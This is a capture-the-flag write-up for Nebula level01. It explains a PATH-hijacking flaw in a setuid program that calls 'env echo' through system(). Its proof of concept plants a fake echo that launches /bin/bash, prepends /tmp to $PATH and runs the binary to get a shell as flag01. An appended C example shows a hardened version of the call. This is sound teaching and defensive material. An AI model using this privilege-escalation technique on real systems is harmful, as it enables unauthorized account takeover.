Exploit-Exercises Nebula - Level01

Executive Summary

The level01 challenge of Exploit-Exercises is to modify $PATH so that arbitrary execution can be achieved.

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Proof Of Concept

In the C source code above, the bug is in system("/usr/bin/env echo and now what?"): the echo command is not called by its full path, so env looks it up through $PATH. We can therefore create a new file named echo that contains /bin/bash and modify $PATH so that the 'evil echo' file we created is executed, giving us shell access as user flag01.

sh-4.2$ echo "/bin/bash" > /tmp/echo
sh-4.2$ chmod +x /tmp/echo
sh-4.2$ export PATH="/tmp/":$PATH
sh-4.2$ ./flag01
[email protected]:/home/flag01$ getflag
You have successfully executed getflag on a target account
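
For comparison, a hardened form of the call from the source code above, written as an added example (it is not part of the original page or of the Nebula project). The function names resolve_in_path, run_echo_fixed and demo_hostile_path are hypothetical, and echo is assumed to be installed at /bin/echo.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* First-match PATH lookup, as env(1) and execvp(3) do it. Returns a static
 * buffer naming the winning file, or NULL (empty PATH entries are skipped). */
const char *resolve_in_path(const char *name, const char *path)
{
    static char hit[4096];
    char *copy = strdup(path), *save = NULL, *dir;
    const char *res = NULL;
    if (!copy) return NULL;
    for (dir = strtok_r(copy, ":", &save); dir && !res; dir = strtok_r(NULL, ":", &save)) {
        snprintf(hit, sizeof hit, "%s/%s", dir, name);
        if (access(hit, X_OK) == 0) res = hit;   /* first executable match wins */
    }
    free(copy);
    return res;
}

/* Hardened form of the level's system() call: absolute path (assumed
 * /bin/echo), no shell, fixed environment; the caller's $PATH is ignored. */
int run_echo_fixed(void)
{
    char *const argv[] = { "echo", "and", "now", "what?", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);
        _exit(127);                       /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Poison PATH as in the walkthrough, then run the hardened call anyway. */
int demo_hostile_path(void)
{
    const char *p;
    setenv("PATH", "/tmp/", 1);
    p = resolve_in_path("echo", getenv("PATH"));
    printf("PATH lookup would pick: %s\n", p ? p : "(none)");
    return run_echo_fixed();
}
int main(void) { return demo_hostile_path(); }
```

resolve_in_path shows why the original call is controllable by the caller, while run_echo_fixed returns the exit status of the real /bin/echo regardless of what $PATH contains.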